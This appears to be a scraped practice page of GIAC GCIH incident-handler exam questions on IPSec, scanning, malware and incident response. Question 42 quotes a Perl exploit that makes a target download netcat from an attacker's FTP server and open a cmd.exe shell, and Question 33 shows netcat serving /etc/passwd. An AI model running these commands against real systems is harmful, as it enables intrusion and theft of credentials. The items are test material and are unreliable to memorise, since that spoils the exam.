New Year Special Sale - Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: mxmas70

Home > GIAC > Security Administration > GCIH

GCIH GIAC Certified Incident Handler Question and Answers

Question # 4

US Garments wants all encrypted data communication between corporate office and remote location.

They want to achieve following results:

l Authentication of users

l Anti-replay

l Anti-spoofing

l IP packet encryption

They implemented IPSec using Authentication Headers (AHs). Which results does this solution provide?

Each correct answer represents a complete solution. Choose all that apply.

A.

Anti-replay

B.

IP packet encryption

C.

Authentication of users

D.

Anti-spoofing

Full Access
Question # 5

Which of the following steps of incident response is steady in nature?

A.

Containment

B.

Eradication

C.

Preparation

D.

Recovery

Full Access
Question # 6

You want to create an SSH tunnel for POP and SMTP protocols. Which of the following commands will you run?

A.

ssh -L 110:mailhost:110 -L 25

B.

ssh -L 110:mailhost:110 -L 25:mailhost:25 -1

C.

ssh -L 25:mailhost:110 -L 110

D.

ssh -L 110:mailhost:110 -L 25:mailhost:25 -1 user -N mailhost

Full Access
Question # 7

You are concerned about rootkits on your network communicating with attackers outside your network. Without using an IDS how can you detect this sort of activity?

A.

By examining your domain controller server logs.

B.

You cannot, you need an IDS.

C.

By examining your firewall logs.

D.

By setting up a DMZ.

Full Access
Question # 8

Which of the following IP packet elements is responsible for authentication while using IPSec?

A.

Authentication Header (AH)

B.

Layer 2 Tunneling Protocol (L2TP)

C.

Internet Key Exchange (IKE)

D.

Encapsulating Security Payload (ESP)

Full Access
Question # 9

Which of the following types of attacks slows down or stops a server by overloading it with requests?

A.

DoS attack

B.

Impersonation attack

C.

Network attack

D.

Vulnerability attack

Full Access
Question # 10

Which of the following HTTP requests is the SQL injection attack?

Full Access
Question # 11

Fill in the blank with the appropriate name of the tool.

______ scans for rootkits by comparing SHA-1 hashes of important files with known good ones in online database.

Full Access
Question # 12

Windump is a Windows port of the famous TCPDump packet sniffer available on a variety of platforms. In order to use this tool on the Windows platform a user must install a packet capture library.

What is the name of this library?

A.

PCAP

B.

SysPCap

C.

WinPCap

D.

libpcap

Full Access
Question # 13

Which of the following provides packet-level encryption between hosts in a LAN?

A.

PPTP

B.

IPsec

C.

PFS

D.

Tunneling protocol

Full Access
Question # 14

Which of the following refers to a condition in which a hacker sends a bunch of packets that leave TCP ports half open?

A.

Spoofing

B.

Hacking

C.

SYN attack

D.

PING attack

Full Access
Question # 15

Which of the following are based on malicious code?

Each correct answer represents a complete solution. Choose two.

A.

Denial-of-Service (DoS)

B.

Biometrics

C.

Trojan horse

D.

Worm

Full Access
Question # 16

Which of the following statements is true about a Trojan engine?

A.

It limits the system resource usage.

B.

It specifies the signatures that keep a watch for a host or a network sending multiple packets to a single host or a single network.

C.

It specifies events that occur in a related manner within a sliding time interval.

D.

It analyzes the nonstandard protocols, such as TFN2K and BO2K.

Full Access
Question # 17

Maria works as a professional Ethical Hacker. She has been assigned the project of testing the security of www.gentech.com. She is using dumpster diving to gather information about Gentech Inc.

In which of the following steps of malicious hacking does dumpster diving come under?

A.

Multi-factor authentication

B.

Role-based access control

C.

Mutual authentication

D.

Reconnaissance

Full Access
Question # 18

Which of the following penetration testing phases involves reconnaissance or data gathering?

A.

Attack phase

B.

Pre-attack phase

C.

Post-attack phase

D.

Out-attack phase

Full Access
Question # 19

Which of the following functions in c/c++ can be the cause of buffer overflow?

Each correct answer represents a complete solution. Choose two.

A.

printf()

B.

strcat()

C.

strcpy()

D.

strlength()

Full Access
Question # 20

Which of the following nmap command parameters is used for TCP SYN port scanning?

A.

-sF

B.

-sU

C.

-sX

D.

-sS

Full Access
Question # 21

You want to perform passive footprinting against we-are-secure Inc. Web server. Which of the following tools will you use?

A.

Nmap

B.

Ethereal

C.

Ettercap

D.

Netcraft

Full Access
Question # 22

Which of the following statements about Ping of Death attack is true?

A.

In this type of attack, a hacker sends more traffic to a network address than the buffer can handle.

B.

This type of attack uses common words in either upper or lower case to find a password.

C.

In this type of attack, a hacker maliciously cuts a network cable.

D.

In this type of attack, a hacker sends ICMP packets greater than 65,536 bytes to crash a system.

Full Access
Question # 23

Fill in the blank with the appropriate term.

______ is a free Unix subsystem that runs on top of Windows.

Full Access
Question # 24

Which of the following systems is used in the United States to coordinate emergency preparedness and incident management among various federal, state, and local agencies?

A.

US Incident Management System (USIMS)

B.

National Disaster Management System (NDMS)

C.

National Emergency Management System (NEMS)

D.

National Incident Management System (NIMS)

Full Access
Question # 25

You discover that your network routers are being flooded with broadcast packets that have the return address of one of the servers on your network. This is resulting in an overwhelming amount of traffic going back to that server and flooding it. What is this called?

A.

Syn flood

B.

Blue jacking

C.

Smurf attack

D.

IP spoofing

Full Access
Question # 26

Which of the following tools is used to attack the Digital Watermarking?

A.

Active Attacks

B.

2Mosaic

C.

Steg-Only Attack

D.

Gifshuffle

Full Access
Question # 27

John works as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. The company is aware of various types of security attacks and wants to impede them. Hence, management has assigned John a project to port scan the company's Web Server. For this, he uses the nmap port scanner and issues the following command to perform idle port scanning:

nmap -PN -p- -sI IP_Address_of_Company_Server

He analyzes that the server's TCP ports 21, 25, 80, and 111 are open.

Which of the following security policies is the company using during this entire process to mitigate the risk of hacking attacks?

A.

Non-disclosure agreement

B.

Antivirus policy

C.

Acceptable use policy

D.

Audit policy

Full Access
Question # 28

Adam, a novice web user, is very conscious about the security. He wants to visit the Web site that is known to have malicious applets and code. Adam always makes use of a basic Web Browser to perform such testing.

Which of the following web browsers can adequately fill this purpose?

A.

Mozilla Firefox

B.

Internet explorer

C.

Lynx

D.

Safari

Full Access
Question # 29

You want to integrate the Nikto tool with nessus vulnerability scanner. Which of the following steps will you take to accomplish the task?

Each correct answer represents a complete solution. Choose two.

A.

Place nikto.pl file in the /etc/nessus directory.

B.

Place nikto.pl file in the /var/www directory.

C.

Place the directory containing nikto.pl in root's PATH environment variable.

D.

Restart nessusd service.

Full Access
Question # 30

Which of the following types of malware can an antivirus application disable and destroy?

Each correct answer represents a complete solution. Choose all that apply.

A.

Rootkit

B.

Trojan

C.

Crimeware

D.

Worm

E.

Adware

F.

Virus

Full Access
Question # 31

Which of the following refers to applications or files that are not classified as viruses or Trojan horse programs, but can still negatively affect the performance of the computers on your network and introduce significant security risks to your organization?

A.

Hardware

B.

Grayware

C.

Firmware

D.

Melissa

Full Access
Question # 32

In which of the following malicious hacking steps does email tracking come under?

A.

Reconnaissance

B.

Gaining access

C.

Maintaining Access

D.

Scanning

Full Access
Question # 33

Which of the following actions is performed by the netcat command given below?

nc 55555 < /etc/passwd

A.

It changes the /etc/passwd file when connected to the UDP port 55555.

B.

It resets the /etc/passwd file to the UDP port 55555.

C.

It fills the incoming connections to /etc/passwd file.

D.

It grabs the /etc/passwd file when connected to UDP port 55555.

Full Access
Question # 34

Rick works as a Computer Forensic Investigator for BlueWells Inc. He has been informed that some confidential information is being leaked out by an employee of the company. Rick suspects that someone is sending the information through email. He checks the emails sent by some employees to other networks. Rick finds out that Sam, an employee of the Sales department, is continuously sending text files that contain special symbols, graphics, and signs. Rick suspects that Sam is using the Steganography technique to send data in a disguised form. Which of the following techniques is Sam using?

Each correct answer represents a part of the solution. Choose all that apply.

A.

Linguistic steganography

B.

Perceptual masking

C.

Technical steganography

D.

Text Semagrams

Full Access
Question # 35

Fill in the blank with the appropriate word.

StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft's /GS option use ______ defense against buffer overflow attacks.

Full Access
Question # 36

Adam works as an Incident Handler for Umbrella Inc. He has been sent to the California unit to train the members of the incident response team. As a demo project he asked members of the incident response team to perform the following actions:

Remove the network cable wires.

Isolate the system on a separate VLAN

Use a firewall or access lists to prevent communication into or out of the system.

Change DNS entries to direct traffic away from compromised system

Which of the following steps of the incident handling process includes the above actions?

A.

Identification

B.

Containment

C.

Eradication

D.

Recovery

Full Access
Question # 37

Buffer overflows are one of the major errors used for exploitation on the Internet today. A buffer overflow occurs when a particular operation/function writes more data into a variable than the variable was designed to hold.

Which of the following are the two popular types of buffer overflows?

Each correct answer represents a complete solution. Choose two.

A.

Dynamic buffer overflows

B.

Stack based buffer overflow

C.

Heap based buffer overflow

D.

Static buffer overflows

Full Access
Question # 38

You are responsible for security at a company that uses a lot of Web applications. You are most concerned about flaws in those applications allowing some attacker to get into your network. What method would be best for finding such flaws?

A.

Manual penetration testing

B.

Code review

C.

Automated penetration testing

D.

Vulnerability scanning

Full Access
Question # 39

You run the following bash script in Linux:

for i in 'cat hostlist.txt' ;do

nc -q 2 -v $i 80 < request.txt done

Where, hostlist.txt file contains the list of IP addresses and request.txt is the output file. Which of the following tasks do you want to perform by running this script?

A.

You want to put nmap in the listen mode to the hosts given in the IP address list.

B.

You want to perform banner grabbing to the hosts given in the IP address list.

C.

You want to perform port scanning to the hosts given in the IP address list.

D.

You want to transfer file hostlist.txt to the hosts given in the IP address list.

Full Access
Question # 40

Which of the following statements are true about worms?

Each correct answer represents a complete solution. Choose all that apply.

A.

Worms cause harm to the network by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.

B.

Worms can exist inside files such as Word or Excel documents.

C.

One feature of worms is keystroke logging.

D.

Worms replicate themselves from one system to another without using a host file.

Full Access
Question # 41

You work as a Penetration Tester for the Infosec Inc. Your company takes the projects of security auditing. Recently, your company has assigned you a project to test the security of the we-aresecure.com Web site. For this, you want to perform the idle scan so that you can get the ports open in the we-are-secure.com server. You are using Hping tool to perform the idle scan by using a zombie computer. While scanning, you notice that every IPID is being incremented on every query, regardless whether the ports are open or close. Sometimes, IPID is being incremented by more than one value.

What may be the reason?

A.

The firewall is blocking the scanning process.

B.

The zombie computer is not connected to the we-are-secure.com Web server.

C.

The zombie computer is the system interacting with some other system besides your computer.

D.

Hping does not perform idle scanning.

Full Access
Question # 42

Adam, a malicious hacker performs an exploit, which is given below:

#####################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#####################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host –C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

A.

Creates a share called "sasfile" on the target system

B.

Creates an FTP server with write permissions enabled

C.

Opens up a SMTP server that requires no username or password

D.

Opens up a telnet listener that requires no username or password

Full Access
Question # 43

Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords?

A.

Rainbow attack

B.

Brute Force attack

C.

Dictionary attack

D.

Hybrid attack

Full Access
Question # 44

In which of the following scanning methods do Windows operating systems send only RST packets irrespective of whether the port is open or closed?

A.

TCP FIN

B.

FTP bounce

C.

XMAS

D.

TCP SYN

Full Access
Question # 45

Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to test the network security of the company. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Visitors were allowed to click on a company's icon to mark the progress of the test. Adam successfully embeds a keylogger. He also added some statistics on the webpage. The firewall protects the network well and allows strict Internet access.

How was security compromised and how did the firewall respond?

A.

The attack was social engineering and the firewall did not detect it.

B.

Security was not compromised as the webpage was hosted internally.

C.

The attack was Cross Site Scripting and the firewall blocked it.

D.

Security was compromised as keylogger is invisible for firewall.

Full Access
Question # 46

Adam, a malicious hacker, wants to perform a reliable scan against a remote target. He is not concerned about being stealth at this point.

Which of the following type of scans would be most accurate and reliable?

A.

UDP sacn

B.

TCP Connect scan

C.

ACK scan

D.

Fin scan

Full Access
Question # 47

Which of the following tools can be used to perform brute force attack on a remote database?

Each correct answer represents a complete solution. Choose all that apply.

A.

SQLBF

B.

SQLDict

C.

FindSA

D.

nmap

Full Access
Question # 48

You see the career section of a company's Web site and analyze the job profile requirements. You conclude that the company wants professionals who have a sharp knowledge of Windows server 2003 and Windows active directory installation and placement. Which of the following steps are you using to perform hacking?

A.

Scanning

B.

Covering tracks

C.

Reconnaissance

D.

Gaining access

Full Access
Question # 49

Adam works as a Network Administrator for PassGuide Inc. He wants to prevent the network from DOS attacks. Which of the following is most useful against DOS attacks?

A.

SPI

B.

Distributive firewall

C.

Honey Pot

D.

Internet bot

Full Access